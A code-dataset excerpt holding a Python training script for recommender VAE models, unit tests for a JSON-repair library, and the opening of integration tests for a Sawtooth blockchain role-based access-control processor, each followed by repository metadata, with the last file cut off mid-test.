2021-05-05T15:44:20.000Z
|
import sys
import os
UTILS_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'utils')
sys.path.insert(1, UTILS_DIR)
from training import train, test
if __name__ == '__main__':
BREAK_EARLY = False
BATCH_SIZE = 500
print("For this one, I just want to try out a different KL or two. Because we didn't get the competitive results we asked for the other way.")
for data_subdir in ['msd']:
actor_path = "VAE_ACTOR_TRAIN_{}_KL=0.1".format(data_subdir)
train(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=100,
n_epochs_ac_only=0,
n_epochs_pred_and_ac=0,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
logging_frequency=200,
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
path_to_save_actor=actor_path,
log_critic_training_error=False,
)
print("Now, hopefully on to testing...")
test(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=100,
n_epochs_ac_only=0,
n_epochs_pred_and_ac=0,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
)
print("On to round 2! Now we'll do the critic.")
train(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=0,
n_epochs_ac_only=50,
n_epochs_pred_and_ac=50,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
logging_frequency=200,
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
restore_trained_actor_path=actor_path,
)
print("Now, hopefully on to testing...")
test(
model_class='multi_vae',
data_subdir=data_subdir,
n_epochs_pred_only=0,
n_epochs_ac_only=50,
n_epochs_pred_and_ac=50,
# max_kl=0.2,
max_kl=0.1,
ac_reg_loss_scaler=0.0,
actor_reg_loss_scaler=0.01,
evaluation_metric="NDCG",
batch_size=BATCH_SIZE,
break_early=BREAK_EARLY,
verbose=False,
version_tag="FULL_RUN_ON_MSD_ONLY",
restore_trained_actor_path=actor_path,
)
print("Bye bye")
exit()
# train(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=200,
# n_epochs_ac_only=0,
# n_epochs_pred_and_ac=0,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# ac_reg_loss_scaler=0.0,
# # actor_reg_loss_scaler=0.00001,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# path_to_save_actor="200_epochs_HIS_DAE",
# # path_to_save_last_actor="LAST_ACTOR_OF_200_epochs_HIS_KL_annealing",
# # restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Now, hopefully on to testing...")
# test(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# # restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("On to round 2! Now we'll do the critic.")
# train(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# ac_reg_loss_scaler=0.0,
# # actor_reg_loss_scaler=0.00001,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# # path_to_save_last_actor="LAST_ACTOR_OF_200_epochs_HIS_KL_annealing",
# restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Now, hopefully on to testing...")
# test(
# # model_class="wmf",
# model_class='multi_dae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=100,
# # min_kl=0.0001,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0,
# actor_reg_loss_scaler=0.01,
# # positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="TRAINING_DAE",
# # path_to_save_actor="200_epochs_HIS_DAE",
# restore_trained_actor_path="200_epochs_HIS_DAE",
# )
# print("Bye bye")
# exit()
# for positive_weights in [2.0, 5.0, 10.0, 30.0, 50.0, 100.0]:
# train(
# model_class="wmf",
# # model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=50,
# n_epochs_ac_only=0,
# n_epochs_pred_and_ac=0,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0005,
# actor_reg_loss_scaler=0.00001,
# positive_weights=positive_weights,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="making_one_trained_on_each_eval_metric",
# # path_to_save_actor="test_actor_save",
# # restore_trained_actor_path="last_actor_after_150_trained_epochs"
# )
# exit("Exiting gracefully!")
# # train(
# # model_class='multi_vae',
# # # model_class='warp_encoder',
# # n_epochs_pred_only=0,
# # n_epochs_ac_only=50,
# # n_epochs_pred_and_ac=100,
# # epochs_to_anneal_over=50,
# # max_kl=0.2,
# # ac_reg_loss_scaler=0.0005,
# # # evaluation_metric='AP',
# # evaluation_metric="NDCG",
# # # logging_frequency=25,
# # # logging_frequency=50,
# # logging_frequency=50,
# # batch_size=500,
# # # batch_size=25,
# # break_early=False,
# # verbose=False,
# # # path_to_save_actor="best_ndcg_trained_150_epochs",
# # # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# # version_tag="making_one_trained_on_each_eval_metric",
# # # path_to_save_actor="test_actor_save",
# # restore_trained_actor_path="last_actor_after_150_trained_epochs"
# # )
# print("Just for good measure, I'm going to run the test function too.")
# test(
# model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=100,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# ac_reg_loss_scaler=0.0005,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# # logging_frequency=50,
# # logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# # path_to_save_actor="best_ndcg_trained_150_epochs",
# # path_to_save_last_actor="last_actor_after_150_trained_epochs",
# version_tag="making_one_trained_on_each_eval_metric",
# # path_to_save_actor="test_actor_save",
# restore_trained_actor_path="last_actor_after_150_trained_epochs"
# )
# exit("Bye bye now! I doubt it will make it here, but a man can dream.")
# for ac_reg_loss_scaler in [0.0, 1e-3, 1e-2, 1e-1]:
# train(
# model_class='multi_vae',
# # model_class='warp_encoder',
# n_epochs_pred_only=0,
# n_epochs_ac_only=50,
# n_epochs_pred_and_ac=50,
# epochs_to_anneal_over=50,
# max_kl=0.2,
# # evaluation_metric='AP',
# evaluation_metric="NDCG",
# # logging_frequency=25,
# logging_frequency=50,
# batch_size=500,
# # batch_size=25,
# break_early=False,
# verbose=False,
# ac_reg_loss_scaler=ac_reg_loss_scaler,
# version_tag="hyperparameter_ac_reg",
# # path_to_save_actor="best_ndcg_trained_100_epochs",
# # path_to_save_last_actor="last_actor_after_100_trained_epochs",
# # path_to_save_actor="test_actor_save",
# restore_trained_actor_path="best_ndcg_trained_100_epochs",
# )
| 34.259475
| 146
| 0.587099
| 1,485
| 11,751
| 4.152189
| 0.100337
| 0.040869
| 0.056925
| 0.054492
| 0.893124
| 0.888096
| 0.884204
| 0.876419
| 0.876419
| 0.865715
| 0
| 0.053102
| 0.304485
| 11,751
| 342
| 147
| 34.359649
| 0.701334
| 0.621905
| 0
| 0.756098
| 0
| 0.012195
| 0.101563
| 0.006104
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.036585
| 0
| 0.036585
| 0.060976
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35170ef513a8a0bd897201745a96b5f7f4c91dc3
| 2,146
|
py
|
Python
|
tests/test_stop.py
|
half-pie/half-json
|
d8064e90ac769547c22db11bcbe47fcb4f1eb600
|
[
"MIT"
] | 4
|
2020-08-04T15:14:25.000Z
|
2021-08-18T18:29:03.000Z
|
tests/test_stop.py
|
half-pie/half-json
|
d8064e90ac769547c22db11bcbe47fcb4f1eb600
|
[
"MIT"
] | 1
|
2019-06-04T15:01:31.000Z
|
2019-06-04T15:01:31.000Z
|
tests/test_stop.py
|
half-pie/half-json
|
d8064e90ac769547c22db11bcbe47fcb4f1eb600
|
[
"MIT"
] | 3
|
2019-06-01T14:16:32.000Z
|
2021-06-25T10:10:47.000Z
|
# coding=utf8
import unittest
from half_json.core import JSONFixer
class TestOtherCase(unittest.TestCase):
def test_patch_left_object(self):
line = '}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{}', newline)
def test_patch_left_array(self):
line = ']'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[]', newline)
def test_patch_half_array(self):
line = '[]]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[[]]', newline)
def test_patch_half_object(self):
line = '{}}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"":{}}', newline)
def test_patch_half_object_array(self):
line = '{}]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[{}]', newline)
def test_patch_half_array_object(self):
line = '[]}'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"":[]}', newline)
def test_patch_half_array_with_coma(self):
line = '1, [""], -1]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[1, [""], -1]', newline)
def test_patch_half_array_with_coma_v2(self):
line = '1, 2'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[1, 2]', newline)
def test_patch_half_object_with_colon(self):
line = '"a":'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('{"a":null}', newline)
def test_patch_many_half_object(self):
line = '{}[]{}}]'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('[{"":{},"":[],"":{}}]', newline)
def test_patch_string(self):
line = 'E"'
ok, newline, _ = JSONFixer().fix(line)
self.assertTrue(ok)
self.assertEqual('"E"', newline)
| 28.613333
| 58
| 0.56617
| 234
| 2,146
| 4.961538
| 0.153846
| 0.066322
| 0.113695
| 0.198966
| 0.826012
| 0.826012
| 0.801034
| 0.801034
| 0.763135
| 0.763135
| 0
| 0.006345
| 0.26561
| 2,146
| 74
| 59
| 29
| 0.73033
| 0.005126
| 0
| 0.37931
| 0
| 0
| 0.057665
| 0.009845
| 0
| 0
| 0
| 0
| 0.37931
| 1
| 0.189655
| false
| 0
| 0.034483
| 0
| 0.241379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35185f7946a37445fcdf93fc6c4208d86886d823
| 78,601
|
py
|
Python
|
integration_tests/blockchain/blockchain_integration_test.py
|
hyperultra/sawtooth-next-directory-poc
|
cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/blockchain/blockchain_integration_test.py
|
hyperultra/sawtooth-next-directory-poc
|
cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401
|
[
"Apache-2.0"
] | null | null | null |
integration_tests/blockchain/blockchain_integration_test.py
|
hyperultra/sawtooth-next-directory-poc
|
cb34b7b3d906bc5b5d429078ba5cf0ffc9af0401
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
from base64 import b64decode
import sys
import logging
import time
import unittest
from uuid import uuid4
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from sawtooth_cli.rest_client import RestClient
import sawtooth_signing
from sawtooth_signing.secp256k1 import Secp256k1PrivateKey
from rbac_addressing import addresser
from rbac_transaction_creation.protobuf import user_state_pb2
from rbac_transaction_creation.common import Key
from rbac_transaction_creation import manager_transaction_creation
from rbac_transaction_creation.user_transaction_creation import create_user
from rbac_transaction_creation import role_transaction_creation
from rbac_transaction_creation import task_transaction_creation
LOGGER = logging.getLogger(__name__)
LOGGER.level = logging.DEBUG
LOGGER.addHandler(logging.StreamHandler(sys.stdout))
BATCHER_PRIVATE_KEY = Secp256k1PrivateKey.new_random().as_hex()
BATCHER_KEY = Key(BATCHER_PRIVATE_KEY)
BATCHER_PUBLIC_KEY = BATCHER_KEY.public_key
def wait_until_status(url, status_code=200, tries=5):
"""Pause the program until the given url returns the required status.
Args:
url (str): The url to query.
status_code (int, optional): The required status code. Defaults to 200.
tries (int, optional): The number of attempts to request the url for
the given status. Defaults to 5.
Raises:
AssertionError: If the status is not received in the given number of
tries.
"""
attempts = tries
while attempts > 0:
try:
response = urlopen(url)
if response.getcode() == status_code:
return
except HTTPError as err:
if err.code == status_code:
return
LOGGER.debug('failed to read url: %s', str(err))
except URLError as err:
LOGGER.debug('failed to read url: %s', str(err))
sleep_time = (tries - attempts + 1) * 2
LOGGER.debug('Retrying in %s secs', sleep_time)
time.sleep(sleep_time)
attempts -= 1
raise AssertionError(
"{} is not available within {} attempts".format(url, tries))
def wait_for_rest_apis(endpoints, tries=5):
"""Pause the program until all the given REST API endpoints are available.
Args:
endpoints (list of str): A list of host:port strings.
tries (int, optional): The number of attempts to request the url for
availability.
"""
for endpoint in endpoints:
wait_until_status(
'http://{}/blocks'.format(endpoint),
status_code=200,
tries=tries)
class TestBlockchain(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = RBACClient('http://rest-api:8080')
cls.key1, cls.user1 = make_key_and_name()
cls.key2a, cls.user2a = make_key_and_name()
cls.key3a, cls.user3a = make_key_and_name()
cls.key2b, cls.user2b = make_key_and_name()
cls.key_invalid, cls.user_invalid = make_key_and_name()
cls.key3b, cls.user3b = make_key_and_name()
cls.role_id1 = str(uuid4())
cls.task_id1 = str(uuid4())
cls.update_manager_proposal_id = str(uuid4())
cls.add_role_admins_proposal_id = str(uuid4())
cls.add_role_owners_proposal_id = str(uuid4())
cls.add_role_members_proposal_id = str(uuid4())
cls.add_role_tasks_proposal_id = str(uuid4())
cls.add_task_admins_proposal_id = str(uuid4())
cls.add_task_owners_proposal_id = str(uuid4())
cls.remove_task_admins_proposal_id = str(uuid4())
cls.remove_task_owners_proposal_id = str(uuid4())
def test_00_create_users(self):
"""Tests that the validation rules within the transaction processor
are applied correctly.
Notes:
1. User
CreateUser Validation rules:
- Public key given for manager must be in state as a User.
- User must not already exist.
- The signing public key must belong to the user or manager.
- The User must have a name longer than 4 characters.
Create 5 Users,
user1
/ \
/ \
user2a user2b
/ \
/ \
user3a user3b
UpdateUserManager Validation rules:
"""
wait_for_rest_apis(['rest-api:8080'])
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user1,
user_name=self.user1,
user_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user2a,
user_name=self.user2a,
user_id=self.key2a.public_key,
manager_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key3a,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key3a.public_key)[0]['status'],
'INVALID',
"The transaction is invalid because the public key given for "
"the manager does not exist in state.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user1,
user_name=self.user1,
user_id=self.key2a.public_key,
manager_id=self.key1.public_key)[0]['status'],
'INVALID',
"The transaction is invalid because the User already exists.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key1.public_key)[0]['status'],
'INVALID',
"The signing key does not belong to the user or manager.")
self.assertEqual(
self.client.create_user(
key=self.key_invalid,
name=self.user_invalid[:4],
user_name=self.user_invalid[:4],
user_id=self.key_invalid.public_key,
manager_id=None)[0]['status'],
'INVALID',
"The User's name must be at least 5 characters long.")
self.assertEqual(
self.client.create_user(
key=self.key2a,
name=self.user3a,
user_name=self.user3a,
user_id=self.key3a.public_key,
manager_id=self.key2a.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key1,
name=self.user2b,
user_name=self.user2b,
user_id=self.key2b.public_key,
manager_id=self.key1.public_key)[0]['status'],
'COMMITTED')
self.assertEqual(
self.client.create_user(
key=self.key3b,
name=self.user3b,
user_name=self.user3b,
user_id=self.key3b.public_key,
manager_id=self.key2b.public_key)[0]['status'],
'COMMITTED')
state_items = self.client.return_state()
self.assertEqual(len(state_items), 5, "There are 5 users in state.")
def test_01_create_roles(self):
"""Tests that the CreateRole validation rules are correct.
Notes:
Role:
CreateRole Validation rules
- There isn't already a Role with the same id
- The Admins listed are Users.
Role1
- Admins
- user1
- user2a
- Owners
- user2b
- Members
- user3a
- user3b
"""
_, role1 = make_key_and_name()
metadata = uuid4().hex
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role1,
role_id=self.role_id1,
metadata=metadata,
admins=[self.key1.public_key, self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role1,
role_id=self.role_id1,
metadata=metadata,
admins=[self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"INVALID",
"The Role Id must not already exist.")
_, role2 = make_key_and_name()
role_id2 = uuid4().hex
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role2,
role_id=role_id2,
metadata=metadata,
admins=[self.key_invalid.public_key, self.key2a.public_key],
owners=[self.key2b.public_key])[0]['status'],
"INVALID",
"All Admins listed must be Users")
self.assertEqual(
self.client.create_role(
key=self.key1,
role_name=role2,
role_id=role_id2,
metadata=metadata,
admins=[self.key2a.public_key],
owners=[self.key_invalid.public_key, self.key2b.public_key])[0]['status'],
"INVALID",
"All Owners listed must be Users")
def test_02_propose_update_user_manager(self):
"""Tests that the ProposeUpdateUserManager validation rules are
correct.
Notes:
ProposeUpdateUserManager Validation rules
- The user exists.
- The manager exists as a user.
- The transaction header signer's public key is the User's
current manager.
- No open proposal for the same change exists.
"""
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
user_id=self.key_invalid.public_key,
new_manager_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist")
self.assertEqual(
self.client.propose_update_manager(
key=self.key_invalid,
proposal_id=uuid4().hex,
user_id=self.key1.public_key,
new_manager_id=self.key_invalid.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The manager must exist")
self.assertEqual(
self.client.propose_update_manager(
key=self.key3b,
proposal_id=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The current manager must sign the txn.")
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=self.update_manager_proposal_id,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There is already a proposal to make user2a have user2b "
"as a manager.")
def test_03_confirm_update_manager_proposal(self):
"""Tests the ConfirmUpdateUserManager validation rules.
Notes:
ConfirmUpdateUserManager validation rules
- The txn signer is the new manager
- The Proposal exists and is OPEN.
"""
self.assertEqual(
self.client.confirm_update_manager(
key=self.key1,
proposal_id=self.update_manager_proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key
)[0]['status'],
"INVALID",
"The txn signer must be the new manager listed on the proposal")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=uuid4().hex,
reason=uuid4().hex,
user_id=uuid4().hex,
manager_id=self.key2b.public_key)[0]['status'],
"INVALID",
"The proposal must exist")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=self.update_manager_proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=self.update_manager_proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key)[0]['status'],
"INVALID",
"The proposal must be open")
def test_04_reject_update_manager_proposal(self):
"""Tests the RejectUpdateUserManager validation rules.
Notes:
RejectUpdateUserManager validation rules
- The proposal is open and exists.
- The manager's id is the header signer pubkey.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_update_manager(
key=self.key2b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key3b.public_key,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
reason=uuid4().hex,
user_id=self.key1.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"INVALID",
"The proposal does not exist")
self.assertEqual(
self.client.reject_update_manager(
key=self.key3b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_update_manager(
key=self.key3b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"INVALID",
"The proposal is not open")
def test_05_propose_add_role_admins(self):
"""Tests the ProposeAddRoleAdmins validation rules.
Notes:
ProposeAddRoleAdmins validation rules
- No proposal exists for the same change.
- The user is not already an admin.
- The txn is signed by either the User or their manager.
- The User exists.
- The Role exists.
At this point:
user1 role1
\ \
user2b admins
/ \ - user1
/ user2a - user2a
user3b \
user3a
"""
invalid_role_id = uuid4().hex
invalid_user_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=invalid_role_id,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=invalid_user_id,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn must be signed by either the user or their manager")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must not already be an admin")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There must not be an open proposal for the same change.")
def test_06_confirm_add_role_admins(self):
"""Tests the ConfirmAddRoleAdmins validation rules.
Notes:
ConfirmAddRoleAdmins validation rules
- The txn signer is a Role Admin for the role.
- The proposal exists and is open.
"""
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key3b,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleAdmin must be an admin "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_07_reject_add_role_admins(self):
"""Tests the RejectAddRoleAdmins validation rules.
Notes:
RejectAddRoleAdmins validation rules
- The txn signer is a role admin.
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The user is not a Role Admin.")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_08_propose_add_role_owners(self):
"""Tests the ProposeAddRoleOwners validation rules.
Notes:
ProposeAddRoleOwners validation rules
- The Role exists.
- The User exists.
- The txn signer is either the User or the User's manager.
- No open proposal exists for the same change.
- The User is not already an Owner of the Role.
"""
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
